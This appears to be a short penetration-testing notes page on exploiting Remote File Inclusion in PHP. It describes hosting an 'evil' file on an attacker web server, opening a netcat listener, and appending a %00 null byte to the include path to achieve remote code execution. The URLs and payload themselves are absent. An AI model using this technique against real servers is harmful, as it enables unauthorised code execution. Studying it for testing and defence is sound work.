RFI
RFI is possible in PHP when the allow_url_include directive is set to On within php.ini.
Host an evil file via HTTP (apache2/python/etc):
Set up a listener for debugging: nc -lvnp 80
Call the file:
This goes to our web server and grabs the evil file. We see is that it requests GET /evil.txt.php from our webserver so we just add a null byte %00 to the end of it to stop it from appending the php. Then it works and since it will be read by the php engine we have RCE:
Txt is used because if we were to use a .php extension then the file would actually run on the attacker machine.
Last updated